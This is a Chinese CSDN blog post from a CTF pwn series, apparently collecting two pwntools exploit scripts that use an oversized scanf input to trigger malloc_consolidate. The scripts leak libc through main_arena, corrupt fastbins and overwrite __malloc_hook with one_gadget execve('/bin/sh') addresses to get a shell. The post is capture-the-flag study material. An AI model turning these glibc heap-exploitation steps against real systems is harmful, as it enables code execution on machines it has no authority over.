技巧篇:scanf触发malloc_consolidate进行unlink(chunk size限制得到极小的chunk)

最新推荐文章于 2024-06-04 20:07:13 发布
最新推荐文章于 2024-06-04 20:07:13 发布
阅读量1.6k 收藏 1
点赞数 1
分类专栏: CTF PWN 文章标签: 系统安全 安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119944520
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

前言:之前刷过这样的题,由于时间原因忘的差不多了,这里捡起两道不相似类型的题进行了大佬的exp学习,这里就不重写exp了,很好理解。一个off-by-one 一个off-by-null

off-by-one exp:

from pwn import *
def add(size, index, content):
    sh.sendlineafter('choice >> \n', '1')
    sh.sendlineafter('Size : ', str(size))
    sh.sendlineafter('index: ', str(index))
    sh.sendafter('name:\n', content)
 
def remove(index):
    sh.sendlineafter('choice >> \n', '2')
    sh.sendlineafter('idx :', str(index))
 
def show(index):
    sh.sendlineafter('choice >> \n', '3')
    sh.sendlineafter('idx :', str(index))
 
for i in range(6):
    add(0x58, i, '\n')
 
for i in range(5):
    remove(i)
 
add(0x28, 4, '\n')
 
sh.sendlineafter('choice >> \n', '0' * 0x400)
 
add(0x58, 0, 'a' * 0x50 + p64(0x61))
add(0x18, 1, '\n')
add(0x50, 2, '\n')
add(0x48, 3, '\n')
remove(1)
remove(5)
add(0x48, 5, '\n')
sh.sendlineafter('choice >> \n', '0' * 0x400)
 
add(0x18, 0, '\n')
add(0x18, 1, '\n')
show(2)
sh.recvuntil('flowers : ')
result = sh.recvuntil('1.', drop=True)
main_arena_addr = u64(result.ljust(8, '\0')) - 88
log.success('main_arena_addr: ' + hex(main_arena_addr))
 
libc_addr = main_arena_addr - (libc.symbols['__malloc_hook'] + 0x10)
log.success('libc_addr: ' + hex(libc_addr))
 
remove(3)
remove(4)
 
add(0x38, 3, '\n')
add(0x50, 4, '\0' * 0x10 + p64(0) + p64(0x51) + p64(main_arena_addr + 0xd))
 
add(0x48, 1, '\n')
 
add(0x48, 0, '\0' * 0x3b + p64(main_arena_addr - 0x28))
add(0x50, 2, '\n')
add(0x50, 2, '\n')
add(0x50, 2, '\n')
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL
 
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL
 
0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL
 
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
add(0x50, 2, p64(libc_addr + 0xf1147) + p64(libc_addr + libc.symbols['realloc'] + 20))
 
sh.sendlineafter('choice >> \n', '1')
sh.sendlineafter('Size : ', str(1))
sh.sendlineafter('index: ', str(1))
 
sh.interactive()

off-by-null exp:

#coding:utf-8
from pwn import *
libc = ELF('/home/roo/桌面/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
context.log_level = "debug"
def choice(idx):
    r.sendlineafter("Choice:", str(idx))
def add(size, content = '\n'):
    choice(1)
    r.sendlineafter("build?", str(size))
    r.sendlineafter("house?", content)
def delete(idx):
    choice(2)
    r.sendlineafter("remove?", str(idx))
def show(idx):
    choice(3)
    r.sendlineafter("view?", str(idx))
def pie(addr=0):
    text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(r.pid)).readlines()[1], 16)
    return text_base + addr
def pwn():
    add(0x28)  # 0
    add(0x40)  # 1
    add(0x40)  # 2
    add(0x40)  # 3
    add(0x40)  # 4
    add(0x40)  # 5
    add(0x18)  # 6
    delete(0)
    delete(1)
    delete(2)
    delete(3)
    delete(4)
    choice('5' * 0x400)
    add(0x28,'a'*0x28)  # 0   chufa unlink off-by-null
    gdb.attach(r)
    add(0x38)  # 1
    add(0x38)  # 2
    add(0x40)  # 3
    add(0x28)  # 4
    delete(1)
    delete(5)
    choice('5' * 0x400)
    add(0x38)  # 1
    show(2)
    main_arena_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 88
    malloc_hook_addr = main_arena_addr - 0x10
    #libc = LibcSearcher('__malloc_hook', malloc_hook_addr)
    #libc_base = malloc_hook_addr - libc.dump('__malloc_hook')
    libc_base = malloc_hook_addr - libc.sym['__malloc_hook']
    realloc_addr = libc_base + libc.sym['realloc']
    #realloc_addr = libc_base + libc.dump('realloc')
    one = [0x45216, 0x4527a, 0xf0274, 0xf1207]
    one_gadget = libc_base + one[3]
    delete(3)
    add(0x28)  # 3
    add(0x18, p64(0) + p64(0x51) + p64(main_arena_addr + 0xD))  # 7
    #heap = pie(0x202060)
    #log.success("heap: " + hex(heap))
    log.success("main_arena_addr: " + hex(main_arena_addr))
    add(0x40)
    delete(0)
    add(0x43, '\x00' * 0x3b + p64(malloc_hook_addr - 0x28))
    add(0x40) #8
    add(0x40) #9
    add(0x40) #10
    add(0x40, p64(0) * 2 + p64(one_gadget) + p64(realloc_addr + 0x6)) #11
    log.success("one_gadget: " + hex(one_gadget))
    #gdb.attach(r, "b *" + hex(one_gadget))
    choice(1)
    r.sendlineafter("build?", str(0x20))
    r.interactive()
while True:
    try:
        r = process('./family')
        pwn()
    except EOFError:
        pass

总结:在malloc chunk的时候有一点就是当bin里都申请完了,这时候会向top chunk进行申请,上面两个exp就是通过mianarena来劫持top chunk进行任意地址申请的攻击手法,在libc2.23通用,lib2.27也应该可以,没遇见过。。。。遇见的时候再慢慢调试。、、、ttttcl我

jsjsj11123
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【牛客 题库】 malloc 函数和 scanf函数
Zender
09-15 835
1.若有 int *p=(int *)malloc(sizeof(int));则向内存申请到内存空间存入整数123的语句为()。 scanf("%d",p); scanf("%d",&p); scanf("%d",*p); scanf("%d",**p); 解答;A 首先看一下malloc函数: 一、原型:extern void *mall
为什么一些人写c++代码,前面会加上std::ios::sync_with_stdio(false); cin.tie(0);这两句话??
01-03
这两句话可以干什么?...是因为先把要输出的东西存入缓冲区,再输出,导致效率降低,而这段语句可以来打消iostream的输入和输出缓存,可节省时间,使效率能达到scanf与printf效率。 tie 函数: tie是将两个stre
[err] malloc_consolidate(): invalid chunk size
bearrex的博客
08-18 2489
代码】[err] malloc_consolidate(): invalid chunk size
scanf&malloc
最新发布
A13837377363的博客
06-04 372
之前知道scanf输入过多时会触发malloc,这次进行系统地记录。
malloc_consolidate
A13837377363的博客
05-15 260
此文章用于详细介绍malloc_consolidate。众所周知,fastbin一般是不能合并,但在malloc_consolidate中是个例外。
Glibc:浅谈 malloc_consolidate() 函数具体实现
热门推荐
加号减减号的博客
02-22 1万+
简介 源代码 分析 0x00 - 堆未初始化则初始化 0x01 - 堆已初始化则清空 fastbin 总结 简介 malloc_consolidate() 函数是定义在 malloc.c 中的一个函数,用于将 fastbin 中的空闲 chunk 合并整理到 unsorted_bin 中以及进行初始化堆的工作,在 malloc() 以及 free() 中均有可能调用 m...
buuctf 强制转换无符号数溢出 任意地址读、跳转 _printf_chk free_hook jmpesp scanf输入过长触发malloc
carol2358的博客
08-06 1184
文章目录zctf2016_note2 zctf2016_note2 本题的漏洞在这里 有符号数和无符号数进行了比较,转换为无符号数, 我们把size设为0,那-1就永远大于i,就可以溢出了 本题可以改got表,heap_ptr的地址也可以找到,那就unlink 改成这样就行,利用chunk1的溢出 然后改atoi为system, 输入sh就行了 exp: from pwn import * from LibcSearcher import * local_file = './note2' loca
doug lea malloc源码剖析之:malloc_consolidate
vt.buxiu技术文集
12-08 1946
流行分配器dlmalloc剖析之:malloc_consolidate版权声明: 本文章由vt.buxiu发布在www.vtzone.org,版权归vtzone研究小组所有,转载请保持此声明!!! @@内容摘要:       consolidate_fastbin函数用于合并fastbin中的空闲内存块,是doug lea malloc(dlmalloc)重要的函数之一。本文以dlmalloc
TC api文档.rar_C语言标准函数库中malloc_TC_api文档_c 函数库_c语言函数库
09-20
在C语言中,使用`malloc()`进行内存分配有助于实现灵活的数据结构,如动态数组、链表等。然而,分配的内存必须通过`free()`函数手动释放,以避免内存泄漏。`free()`函数的原型如下: ```c void free(void* ptr); ``...
stm32_usart.zip_STM32 scanf_stm32 usart
09-22
总之,理解并掌握STM32 USART的初始化和`printf`、`scanf`的使用,对于进行有效的串行通信和设备调试至关重要。在实际项目中,你可以根据具体需求进行调整,例如添加错误处理、优化性能或扩展功能。通过不断实践,你...
Calculate_Current_Age:Calculate_Current_Age
03-21
首先,C语言是一种静态类型的、编译式的、通用的、大小写敏感的、既支持过程化编程也支持面向对象编程的编程语言。它的基础语法包括变量声明、数据类型、运算符、控制结构等。 1. **变量声明**:在C语言中,我们...
mallocsizeof的合用的陷阱
08-03
在编程过程中,我们经常这样运用malloc: int * myarray=(int *)mallocsizeof(int)*length),但是你是否知道,这一句简单的代码隐含了2个陷阱?
My_ls:Epitech的My_ls项目(2017)
03-05
完成这个项目,学生不仅能够掌握C语言的基本编程技巧,还能深入了解操作系统层面的文件系统操作,对提升系统编程能力有极大帮助。同时,通过实际的项目经验,可以提高问题解决和代码调试能力,为将来从事更复杂的...
glibc-2.23_malloc_consolidate_浅析
weixin_30872671的博客
03-26 368
转载于:https://www.cnblogs.com/shangye/p/6622562.html
堆漏洞挖掘中的malloc_consolidate与FASTBIN_CONSOLIDATION_THRESHOLD
董哥的黑板报
07-29 3919
一、何为consolidate 我们知道大于0x80的chunk被释放之后就放到了unsortedbin上面去,但是unsortedbin是一个未分类的bin,上面的chunk也处于未分类的状态。但是这些chunk需要在特定的条件下被整理然后放入到smallbins或者largebins中 这个整理的过程被称为unsortedbin的“consolidate”,但是“consolidate”是...
sleepyHolder_hitcon_2016(fastbin的检查机制+malloc_consolidate+double free)
seaaseesa的博客
04-30 1007
sleepyHolder_hitcon_2016 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,delete功能没有清空指针,并且也没有校验,因此可以double free。 Edit功能又验证标志,因此不能UAF编辑 Add功能可以创建三种规格的堆。 由于没有开启PIE,并且堆指针存储在bss上,因此unlink是比较好的方法。但是不能溢出, 而要想成功d...
malloc 段错误 linux,(绝对难题)高手帮忙看看,malloc出线段错误
weixin_31041421的博客
05-12 781
程序运行,malloc时竟然出现段错误,高手帮忙分析一下原因吧.我写的函数void de_eventip(char *buf, EVENT_DNODE *ptr){struct in_addr *q,*longip;HEAD *head;// q = (struct in_addr *)malloc(100 * sizeof(struct in_addr));head = (HEAD...
奇怪的malloc问题!
ufwt的专栏
09-12 2092
我们的程序运行的很好,多少在每天0点时候可能会吧cpu弄的很高!开始怀疑是glibc的bug(因为死在malloc_consolidate),在网上没有查到,看来还是要查查自己的程序,可能是这个程序错误! 结果:是多线程问题,以为没有同步,使得一个内存被释放了多次,然后使得malloc实现中的list破坏,使得里面死循环!!!
malloc(): invalid size (unsorted) 已放弃 (核心已转储) “怎么解决
k1419197516的博客
03-20 6332
这个错误提示是内存分配出现问题,可能是在代码中使用了无效的指针或者越界访问了数组等导致的。解决这个问题的具体方法需要具体分析代码并进行排查。检查代码中是否存在数组越界的情况,例如访问了不存在的数组元素或者访问了超出数组边界的元素。检查代码中是否有使用无效指针的情况,例如对未初始化的指针进行访问或将已析构的对象指针使用。总之,解决这个问题需要具体分析情况进行排查,并在编写代码时注意规避以上情况。检查代码中是否有内存泄漏的情况,例如创建的动态内存没有及时释放。
ios::sync_with_stdio(0)和scanf谁快
08-29
`ios::sync_with_stdio(0)` 是 C++ 中的一个语句,用于关闭 C++ 的输入输出流与 C 标准库的同步,以提高输入输出的速度。而 `scanf` 是 C 语言中的一个函数,用于从标准输入读取格式化输入。这两者的功能不完全相同,因此无法直接比较它们的速度。 关闭流同步可以提高输入输出的速度,但它可能会导致与标准库的其他函数混合使用时出现问题。因此,如果你只是简单地使用 `scanf` 进行输入,那么关闭流同步可能会稍微提高速度。但是如果你在代码中还使用了其他涉及输入输出的函数,可能会导致一些意想不到的错误。 总的来说,如果你只是使用 `scanf` 进行简单的输入操作,并且不涉及其他与输入输出相关的函数,那么关闭流同步可能会稍微提高速度。但是在实际开发中,为了代码的可读性和可维护性,建议不要过分追求微小的性能提升而关闭流同步。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值